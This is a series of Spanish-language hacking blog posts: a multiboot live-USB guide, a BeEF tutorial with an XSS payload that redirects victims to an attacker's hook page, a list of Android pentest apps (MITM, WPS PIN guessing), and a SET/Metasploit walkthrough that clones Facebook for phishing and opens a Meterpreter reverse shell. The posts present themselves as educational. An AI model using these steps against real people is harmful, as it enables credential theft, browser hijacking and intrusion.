martes, 31 de mayo de 2016

Me lo llevo to en un USEBE




"Aiii amo, cuantas veces le he dicho que mas vale un Live USB que cualquier sistema instalado... que que??? que saque el USB?? si se dice así so paleto no USEBE!"

Buenas Haxors! Vengo a enseñaros que podemos tener siempre preparado un pendrive con varios sistemas operativos que correrán sin problema una vez arrancados desde el ... igualito que si estuvieran instalados en el pc de marras. Parece algo sencillo y trivial pero tener una herramienta así en el bolsillo realmente puede ser útil si se tiene acceso a algún ordenador o si el típico familiar necesita disponer de un ordenador rápido y el suyo esta escacharrado.

Para esto vamos a utilizar un par de programas RMPrep + EasyBoot (desde Windows) o MULTISYSTEM (Desde Ubuntu) y un pendrive ... cuanto mas grande mejor!

Algunos os preguntareis el porque tener varios ... pues porque no siempre vamos a querer hacer lo mismo en un PC. 


"El amo por ejemplo con poder abrir paginas de ovejas es feliz mientras que yo ... prefiero usar mi talento en otro sentido muajajjajaja cosas como ayudar a una bella y agradecida dama... (jijij sobre todo agradecida ;P )"



Estos famosos Live Usb se pueden hacer de 2 maneras

  • Live : Todo cambio que hagas sobre el sistema una vez cierras se borra.
"Para el amo lo mas útil ya que su asqueroso historial bovino queda eliminado... ayyy no me pegue que no le he llamado bobo que se dice así ovejil! ... pensándolo mejor si ... usted es mas bobo que un zapato."
  • Persistente: Todos los cambios que se hagan en el sistema quedan almacenados para la siguiente vez... algo que muchos sabréis que es bastante útil si maqueamos y modificamos el sistema para que luzca como queremos nosotros. Esto normalmente se hace instalando directamente el sistema operativo sobre el pendrive... cosa que en nuestro caso no va a ser posible. 

¿Que sistemas vamos a elegir?
Todo depende de que queramos hacer. Dado que entiendo que lo vais a usar para todo tipo de cosas... vamos a hacernos una navaja suiza en forma de USB.



  1. Un sistema operativo limpio y agradable al usuario ... para cuando a los mayores de la casa se les escacharra el pc pero necesitan para ayer que siga funcionando. Por ejemplo UBUNTU. 
  2. Un antivirus en Live CD: Muchas veces los antivirus normales no son suficiente para eliminar la porquería que se nos instala al visitar las paginas de dudosa reputación en la que ninguno nos metemos... jajaj "si amo las de ovejas tienen parásitos también". El problema viene en que estos virus se meten en el registro de Windows arrancando junto al sistema operativo... y esto los hace imposibles de eliminar a no ser que sea desde fuerao desde un antivirus de arranque, cosa que muchos AV traen ya de serie. Vamos a meter 3: AVAST, Panda Cloud Cleaner y Windows Defender.
  3. Sistema de Pentest : Cuantos no han querido instalar un sistema operativo para poder hacer cosas de hacking... pero a la vez no quieren machacar el Sistema original de su maquina?? pues aquí esta la solución!Por ejemplo KALI
  4. Instalador de Windows: Hay veces que por mas que lo intentes el sistema esta fastidiado del todo... y necesitas restaurar al menos los archivos de sistema.. que mejor que tener en el pendrive el sistema para poder usarlo en caso de necesidad. 
  5. Ophcrack : es un sistema que nos permite "recuperar" contraseñas de Windows cuando no nos acordamos de ellas... como nos podemos encontrar todo tipo de sistemas, bajaremos tanto la version XP como la version VISTA/7 
  6. ERD Commander: Un montón de herramientas que nos permiten trastear con los sistemas Windows 
  7. WifiSlax: Es una distro linux que ha sido diseñada para ataques wifi porque seamos serios... siempre vamos a "olvidarnos" de la clave de la wifi (Siii amo si el FLIFLI ejem...) 
  8. TAILS : Un sistema para la navegación anónima por internet... seamos serios cuando buscamos cosas que no debemos o que narices si no queremos que nos vigilen nuestras comunicaciones... por que no usarlo? Este sistema utiliza la red TOR para anonimizar de forma efectiva la conexión. 
  9. Hirens BOOT CD: es un mix de herramientas para todo tipo de sistemas, desde recuperadores de discos duros, antivirus.. hasta creadores de particiones e imágenes de disco y algo interesante un miniwindows bastante útil en algunos casos. 


"Como ve amo... pido USBs grandes porque meto muchas cosas útiles! no como usted... que los usa para meter ovejas en bikini... Marrano!! como ?? que ??? que le he dado una idea?? que igual ahora diversifica y se dedica también al tema porcino?? amo esta muy enfermo...."

En nuestro caso... no vamos a hacer ningún sistema de forma persistente dado que no nos interesa guardar grandes cambios dentro de los sistemas ya que queremos utilizarlos de la forma mas limpia posible. Para ello formatearemos el USB en formato FAT32 o FAT ya que de otra manera no nos va a hacer el proceso de forma correcta.

Utilizando EasyBoot


Easyboot es un programa que funciona bajo Windows, nos va a ayudar a montar el pendrive con los sistemas operativos que nos interese permitiéndonos crear un pequeño menú para su arranque que nos ayude a elegir el sistema que queremos utilizar en cada momento.



Utilizando MULTISYSTEM


Multisystem es un programa con interfaz gráfica (GUI) que nos permite crear Live USB de arranque con múltiples sistemas operativos, generando un menú para elegir el que queramos con su propio GRUB de linux (no es una pasada?). Esto lo haremos desde Ubuntu.


Tras estos pasos lo unico que queda por decir es que en el PC en el que queramos utilizarlo tenemos que cambiar el orden de arranque de los dispositivos en la BIOS (normalmente aparece al arrancar el PC abajo un pulsa F12 para elegir o F8 o Del) y elegir como dispositivo de arranque el USB para que nos lo coja y pueda funcionar.

Espero que os haya gustado y os sirva de ayuda ;P
Hasta la próxima chavales!
Nebu 

lunes, 30 de mayo de 2016

Automatizando vulnerabilidades XSS con BeEF

Buenas compañeros,

Con esta entrada quería presentaros, aunque imagino que algunos ya lo conoceréis, la herramienta BeEF. Desde mi punto de vista es un pasada de herramienta muy útil y recomendable.



BeEF es una herramienta para automatizar ataques XSS contra aplicaciones web vulnerables del lado del cliente. BeEF contiene un gran arsenal de payloads y ataques contra el objetivo  para conseguir información útil como el sistema operativo, cookies, IP, navegador,...

BeEF ya se encuentra integrada en Kali Linux, por lo que prácticamente nos basaremos en su arranque y ya la tendremos lista para jugar.

Para ello, accediendo a la ruta /usr/share/beef-xss. 





Una vez ahí se ejecuta el fichero beEF: ./beef





También se puede ejecutar clicando en el icono del herramienta en la barra que han añadido en Kali Linux 2.0

Como se observa en la captura anterior, se puede acceder vía web en la url indicada:

http://127.0.0.1:3000/ui/panel

De tal manera que se accede al panel de login:


Seguidamente, introduciendo los credenciales por defecto (beef/beef), se consigue acceso:




Una vez con BeEF ya listo, comienza la prueba de concepto (PoC).

En primer lugar, hay que detectar una vulnerabilidad XSS reflejado o persistente en un aplicación web. Entonces introduciendo una inyección de código del estilo:

'><script>document.location="URL";</script>

BeEF tiene dos escenarios montados en un Apache,siendo uno de ellos algo más currado que es el que vamos a emplear:




Por lo tanto, se inyecta esta url en el input que detectemos vulnerable en una aplicación web:

'><script>document.location="http://172.16.1.2:3000/demos/butcher/index.html";</script>

Para esconder un poco la url, podemos utilizar acortadores de url online como https://bitly.com/ 

De esta manera, cuando una víctima entre en el XSS será redirigido a la página de beEF y se convertirá en un zoombie. Se entiende por zoombie, a un cliente, siendo éste el navegador web de la víctima que tras haber sido objeto de un XSS se dirige a una página controlado por BeEF.
En dicha página, se ejecuta el script (http://127.0.0.1:3000/hook.js) de hook, que se ejecuta cuando la víctima visita la página de BeEf.


Cuando una víctima se conecta, aparece en la vista de "Hooked Browsers":



Como se puede apreciar, un PC con la IP 192.168.1.33 con un sistema operativo Linux y con el navegador Firefox se ha conectado. En la vista de detalles, se aloja información muy útil de la víctima: versión de navegador y sistema operativo, componentes de software instalados (flash, RealPlayer, QuickTime,...)

En la vista de Logs, irán apareciendo todos los eventos del zoombie, mientras que la más interesante es la de Commands, en la que se tienen todos los módulos de BeEF.


Hay que indicar la leyenda de los módulos:

- Verde: La víctima es vulnerable y su ejecución pasa desapercibida.
- Naranja: La víctima es vulnerable pero su ejecución no pasa desapercibida.
- Gris: Indeterminado. ¡Hemos venido a jugar!
- Rojo: La víctima no es vulnerable.

Para comenzar es puede hacer un poco de fingerprinting.  Para ejecutar cualquier módulo es tan fácil como clicar en el, rellenar lo que se pida y en la parte inferior clicar en ejecutar.

Por ejemplo, se podría obtener la cookie:



Detectar si tiene RealPlayer:



Vamos a lo divertido, hay un módulo para que la víctima proporcione permisos para activar la cámara por ejemplo,



Sin embargo, en este caso no usa cámara, pero el mensaje que ve el zoombie es el siguiente:


Revisando los logs, podemos saber todo lo que ha hecho la víctima una vez ha visitado la página de BeEF



Como se muestra en la imagen, se ve todos los datos que ha introducido en los inputs del formulario de la página (un buen keylogger ejecutándose). También dónde ha movido el ratón, prácticamente se puede monitorizar todo el comportamiento del zoombie.¿Mola eh?

Volviendo a los módulos, podríamos instar a la víctima a descargarse una versión de Flash Player (que siempre hay que estar actualizando debido a toda las vulnerabilidades que tiene).
Para ello, en la vista de Ingeniería Social -> Fake Flash Update. En él se indica lo que se desea que se descargue la víctim (por defecto, viene el código de github de BeEF), pero si fueramos chicos malos, podríamos hacer que se bajará un keylogger...



En el zoombie, se vería la siguiente ventana:



Independientemente de donde clique el zoombie (Instalar, recordar más tarde, cerrar o incluso cambiar de pestaña) se pedí confirmación para la descarga del supuesto Flash.

Por último, tiene módulos para hacer un phishing tanto de gmail como de Facebook. En la mismo sección de Ingeniería Social seleccionando Google Phishing:




De tal manera, que la víctima vería el panel de login de gmail, que visualmente es igual.





De tal manera, si una víctima que no se dé cuenta, introduce sus datos, se le indicará que se ha producido un error y se le redirigirá automáticamente al sitio web oficial de gmail.

Mientras tanto en BeEF, nos aparecerán en BeEF:




Como habéis podido ver BeEF es una herramienta muy poderosa para automatizar ataques XSS secuestrando el navegador de la víctima. Ahora bien, estos ataques sólo funcionan mientras la víctima se encuentre en la página trampa de BeEF si no, no tiene efecto. Una vez que cierre el navegador se acabo, BeEF no tiene persistencia en la víctima. Sin embargo, mientras éste ahí se pueden explotar muchas cosas.

Además, BeEF se puede integrar con Metasploit para trabajar conjuntamente. Adicionalmente, hay otra herramienta llamada Subterfuge que posibilita realizar ataques Man in the Middle y también es integrable con BeeF.

Os puedo adelantar que se harán tutoriales y PoC's de estas integraciones pero más adelante =D

La finalidad de esta entrada es con fines educativos, por lo que no somos responsables para otro uso que se le pueda dar.

Espero que les guste =D

Cualquier duda dejen su comentario.

Saludos.

NaxHack5

La mejor defensa es un buena ataque







domingo, 29 de mayo de 2016

Hacking desde Android


Hola seguidores de Fwhibbit, en esta ocasión veremos una lista de aplicaciones relacionadas con la seguridad informática para nuestros dispositivos Android (móviles, phablet, tablet, etc)



DISTRO LINUX

Ya es posible tener una distribución Linux en nuestros dispositivos Android y así tenerla a mano siempre que lo necesitemos. Para ello es necesario ser superusuario o rootear el dispositivo. Existen muchas formas y programas con los que realizar este paso de una forma fácil, basta con poner en Google la marca y modelo de nuestro móvil/tablet y la palabra "root".

Una vez somos superuser, instalaremos las  siguientes aplicaciones:
  • Linux Deploy: con ésta aplicación descargamos, instalamos y corremos la distribución Linux que mas nos guste.
  • VNC Viewer: mediante ésta nos conectaremos a Linux Deploy para asi poder ver y controlar la distribución.
  • BusyBox: con esta aplicación instalaremos en nuestro dispositivo móvil la mayoría de las utilidades propias de los sistemas Linux.

En primer lugar ejecutamos BusyBox y pulsamos install.
Luego abriremos Linux Deploy y nos encontraremos con esta pantalla. (en la configuración de la aplicación podemos cambiar el idioma a español).

Pulsamos en el botón marcado y nos aparecerán las opciones de instalacion.


  • Distribution: elegimos la distro Linux que mas nos guste, en mi caso he elegido Kali Linux.
  • Distribution suite: elegimos la versión de la distro elegida anteriormente.
  • Architecture: aquí tenemos que indicar la arquitectura que corresponda a nuestro dispositivo móvil.
  • Installation path: debemos indicar la ruta donde guardaremos los archivos de instalación de la distro. Tener en cuenta que necesitamos tener varios gigas de espacio libre (en el caso de Kali ocupa unos 4Gb). Podemos elegir tanto la memoria interna como externa de nuestro dispositivo.
  • User name: indicaremos el nombre de usuario que luego usaremos para conectarnos a la máquina.
  • User password: contraseña del usuario.
  • Desktop environment: entorno de escritorio para la distro.
  • Select components: en esta opción elegimos algunos de los programas que queramos incluir en la distro. 


Una parte importante es la opción GUI settings, en esta parte tenemos que configurar la resolución de nuestro dispositivo y que utilizará la distro.
  • Depth (bits): indicamos la profundidad en bits de la pantalla del dispositivo.
  • DPI: puntos por pulgada de la pantalla.
  • Width y Height: es estas opciones, indicaremos la anchura y altura de la pantalla respectivamente. Os recomiendo que pongais los datos al revés (si vais a utilizar el móvil en apaisado u horizontal), es decir, introducir la anchura en la altura y viceversa, de esta forma no tedreis problemas.

Dispone de mas opciones para configurar, pero esas las dejo a gusto del consumidor. Con todo configurado, pulsamos en botón Install para que comience la descarga he instalación de la distribución (este proceso puede tardar bastante).


NOTA: además de Linux Deploy, existe otra aplicación, Complete Linux Installer, que también nos permite instalar distribuciones Linux en Android. En caso de que la anterior os diera problemas, podéis utilizar ésta otra.


Una vez se haya terminado de instalar, pulsamos el botón Start para arrancar la distro. Sin cerrar completamente Linux Deploy (pulsamos el botón Home de nuestro móvil), abrimos la aplicación VNC Viewer y crearemos una nueva conexión.




Pulsamos el botón "+" y nos aparece la siguiente pantalla. Escribimos localhost en Address, el nombre que querais para identificarlo y pulsamos Create. Por último nos conectamos y ya tendremos Kali Linux en nuestro dispositivo Android.




zANTI

Esta aplicación se trata de una completa herramienta desarrollada para realizar pruebas de penetración en redes, lista de equipos conectados, buscador de vulnerabilidades, atacar puertos o redireccionar el tráfico entre otras. Para obtener la aplicación debemos dirigirnos a su web (no está disponible en Google Play).

Al abrir zANTI, realizará un escaneo de la red donde estemos conectados y mostrará la lista de dispositivos conectados a la misma (para ello realiza un Nmap).



Como podeis ver en la captura anterior, zANTI nos muestra la dirección IP, Mac Address, Sistema Operativo y número de puertos abiertos en cada dispositivo.

Para realizar cualquier acción, debemos pulsar en uno de los host y aparecerá la siguiente pantalla con las acciones disponibles.


Acciones operativas:

  • Analizar: nos permite elegir entre los diferentes tipos de escaneos que dispone Nmap y buscar vulnerabilidades automáticamente.
  • Conectar al puerto remoto: podemos conectarnos a alguno de los puertos que tenga el host abierto.


Acciones de ataque:

  • Auditar la complejidad contraseñas: comprueba las contraseñas mediante un ataque por diccionario, pudiendo elegir entre varios.
  • Man in the Middle: ataque de hombre en medio que nos brinda varias opciones:
    • Ver peticiones http, incluye contraseñas capturadas y spoofing de sesiones.
    • Ver las imágenes pedidas por el objetivo.
    • Permite modificar las peticiones http mientras pasan por nuestro dispositivo.
    • Redirigir http a nuestra IP.
    • Cambiar las imágenes que verá el objetivo por la que nosotros indiquemos.
    • Capturar y/o remplazar los archivos descargados.
    • Insertar un CSS en cada web que visite el objetivo.
  • ShellSock: se trata de una vulnerabilidad que radica en la posibilidad que tiene Bash de almacenar en variables de entorno la definición de funciones de scripting y en cómoo son cargadas. zAnti comprueba si el objetivo es vulnerable a este fallo de seguridad.
  • SSL Poodle: esta vulnerabilidad afecta a los navegadores web. Cuando un intento de conexión segura falla, se vuelve a intentar la conexión pero con una versión del protocolo mas antigua. Un atacante puede provocar intencionadamente este error de conexión en protocolos seguros como TLS y forzar el uso de SSL para así obtener información que antes viajaba cifrada. zAnti comprueba si el objetivo es vulnerable a este fallo de seguridad.

JUICESSH

Se trata de un cliente todo en uno, soporta SSH, Shell Local, Mosh y Telnet. Ofrece muchas opciones para hacernos la vida mas fácil:

  • Terminal a color.
  • Popup de teclado con teclas especiales.
  • Soporta teclado externo.
  • Plugins de la comunidad para añadir nuevas funcionalidades.
  • Copiar y Pegar
  • Organizar las conexiones por grupos.
  • Y un largo etc...
Puede descargarse en Google Play.



En el menú principal tenemos varias opciones, destacar el de conexión rápida (rayo en la esquina superior derecha) que nos permite realizar una conexión sin tener que crearla y guardar anteriormente.




Y los Plugins que nos muestra los plugins disponibles de la comunidad, además de poder crear los nuestros propios mediante el SDK de desarrollo de plugins.









La forma de uso es muy sencilla, en la pantalla principal pulsamos en Conexiones y el botón "+" de la esquina inferior derecha.

Nos aparecerá esta pantalla con los ajustes de la nueva conexión.






Alias: nombre para identificar la conexión.

Tipo: el tipo de conexión SSH, Mosh, Dispositivo local o Telnet.

Dirección: IP a la que vamos a conectarnos.

Identidad: aquí tenemos que crear una nueva identidad con el nombre de usuario y contraseña del servicio al que vamos a conectarnos. También ofrece la posibilidad de generar un snippet que añade una clave pública al archivo "/.ssh/authorized_keys".

Puerto: puerto del servicio al que vamos a conectarnos.





Con todo configurado pulsamos el stick de la esquina superior derecha para guardar la conexión.Abrimos la conexión creada y obtendremos una shell.



SSHDROID

Así como veiamos antes JuiceSSH que nos permite conectarnos desde nuestro dispositivo móvil a un pc, también podemos conectarnos desde nuestro pc al móvil mediante SSHDroid.

SSHDroid hace de servidor poniendose a la escucha en el puerto que indiquemos (por defecto 22), y nos conectaremos a éste con nuestro pc u otro dispositivo introduciendo la dirección que nos da la aplicación.


Conexión desde el pc al móvil.




 FING 

Con Fing podemos monitorizar nuestra red wifi y ver que dispositivos están conectados a ella. Obteniendo la siguiente información sobre ellos: IP, MAC, marca tarjeta red, puertos abiertos, etc.




En la segunda captura podéis ver las acciones disponibles.
  • Scan services: escanea en busca de puertos abiertos y nos da la posibilidad de conectarnos a ellos.
  • Ping: realiza un ping al host.
  • Traceroute: comprueba por cuantas ips pasa hasta llegar al objetivo.
  • Wake on LAN: enciende la máquina objetivo mediante su tarjeta de red.

Si entramos en la configuración de la aplicación, nos permite realizar las acciones vistas anteriormente pero a un host que nosotros indiquemos sin tener que estar necesariamente en nuestra red.



WPS Connect


Esta aplicación nos permite conectarnos a una red wifi con el protocolo WPS activado. Para ello, comprueba si el router tiene el PIN por defecto, si es así, se conecta (desconectar el móvil/tablet de cualquier red wifi antes de usar la aplicación).



Su funcionamiento es muy sencillo, en la pantalla principal basta con pulsar el botón de las flechas (esquina superior derecha) para que empiece a escanear las redes wifi que tenemos al alcance.


Una vez tengamos la lista de redes, pulsamos en cualquiera de ellas para intentar conectarnos, nos aparecerá una ventana con la lista de PINs para probar (también podemos escribir uno nosotros mismos).


Con suerte alguno de ellos funcionará y nos conectaremos a la red, nos aparecerá un mensaje de éxito junto con los datos wifi: pin, nombre y password.










IP-TOOLS: Network Utilities

Suite muy completa para el análisis de redes. Dispone de una gran lista de herramientas:

  • Ping
  • Escaner LAN
  • Busqueda DNS
  • Escáner de puertos
  • Whois
  • Configuración del router desde el móvil
  • Traceroute
  • Registro de conexiones
  • Calculadora IP
  • Convertidor IP & Host
  • etc.... 


Con esta suite no habrá IP/host o red que se resista.



Hasta aquí la entrada de hoy, espero que os haya gustado y recordar que está hecho con fines educativos y nunca con malas intenciones, no nos hacemos responsables del mal uso que se le pueda dar.


Un saludo, vasco.

sábado, 28 de mayo de 2016

Ingeniería Social con SET y Metasploit


Buenas a todxs.

Hoy me estreno en este blog para presentaros una herramienta muy interesante orientada a la Ingeniería Social. Su nombre es SET (Social-Engineering Toolkit) y se encuentra disponible en la distribución Kali Linux.
La demo que vamos a realizar en cuestión, será la clonación (phishing) de la web de Facebook, a la vez que realizamos una infección mediante un applet de Java, que controlaremos posteriormente mediante Meterpetrer de Metasploit.
Ante todo, indicar que como obviamente todxs sabemos, esta actividad es meramente educativa y no debería usarse para cometer actos impuros.

Dicho lo dicho, ¡al turrón!

Lo primero que debemos hacer será ejecutar la herramienta en una terminal con el comando setoolkit y seleccionamos la primera opción del menú que se nos muestra: Social-Engineering Attacks.


En el siguiente menú tomaremos la segunda opción: Website Attack Vectors.



A continuación, se nos mostrarán diferentes tipos de ataques. Nosotros nos centraremos en el primero: Java Applet Attack Method.


Se nos mostrará otro nuevo submenú, donde elegiremos el modo en el que queremos crear el phishing. En este caso, haremos una clonación de una página con la segunda opción: Site Cloner.


Una vez seleccionado, se nos preguntará si vamos a usar NAT/Port Forwarding para nuestro ataque, pero como vamos a realizar la prueba en una red local pondremos: “no”.


Introducimos la IP de la máquina donde estamos albergando el phishing.


En el siguiente menú seleccionamos qué applet vamos a utilizar. Al tratarse de un ejemplo sencillo, no nos complicaremos y tiraremos de un applet de SET (opción 2).


En este punto es cuando introduciremos la web que deseamos clonar. Para esta demo he seleccionado Facebook.


Una vez introducida, la web se clonará y pasaremos a la selección del payload.


Para continuar bajo la premisa del mínimo esfuerzo y máxima eficiencia elegiremos la primera opción: Meterpreter Memory Injection (DEFAULT) y podremos el puerto 443 en escucha:


Dentro de la opción elegida utilizaremos Reverse TCP, para que sea la victima la que se conecte a nosotros.


Llegados a este punto, ¡habemus phishing!
Veremos cómo se levanta el servidor Apache2 para publicar nuestra web (ya sabéis… /var/www/) y a continuación se ejecutará el Framework Metasploit.




Ahora abriremos desde otro equipo (o máquina virtual) que tengamos en nuestra red, la IP dónde tenemos el phishing.
En este punto, si queréis, se podría hacer un DNS Spoofing para redirigir el tráfico de la víctima cuanto intente acceder a facebook.com hacia nuestra IP (entre otras cositas que se os ocurran).

Pero ahora tenemos un problema… “con la iglesia hemos dado, Sancho”.
Según hemos planteado este ataque, si tenemos actualizado Java SE a su última versión, se nos bloqueará la infección mediante el applet (pero mantendremos el phishing, eso sí). Una mala costumbre que tiene Java de no confiar en las firmas autofirmadas…


Para saltarnos este bloqueo tendremos que añadir en la configuración del Panel de Control de Java la IP del atacante. Sí, lo sé… nadie va a infectarse con el applet, pero recordad que tenéis la posibilidad de lanzar vuestro propio applet o utilizar otros tipos de ataques (además es un ejemplo educativo y lo sabéis).


Añadida la IP, procedemos a acceder a través de un navegador fantástico como es IE y aceptamos que somos unos incautos que queremos ser infectados a pesar de la notificación de riesgo de seguridad que nos emiten.


Una vez aceptado e introducidos las credenciales de nuestra cuenta, se nos redirigirá a la página oficial de Facebook, como si nos hubiésemos equivocado al introducir las credenciales y aquí nadie se hubiera comido un bicho rico, rico y con fundamento.


Una vez infectado el sistema de la víctima, en nuestra máquina atacante podremos ver cómo se ha registrado en el Meterpreter una nueva sesión.


Para ver las sesiones activas utilizaremos el comando sessions y para acceder a una de ellas: sessions -i númeroDeSesion.


Para comprobar que todo funciona correctamente, podemos utilizar el comando preferido por los stalkers: screenshot



Et Voilà!
Con esto finiquitamos el Briconsejo de hoy, no olvidéis echar el sustrato, siempre mucho sustrato para los geranios.


“La educación es el arma más poderosa que se puede usar para cambiar el mundo” y no lo digo yo, lo dijo Mandela.


Pablo Lorenzo






Google Analytics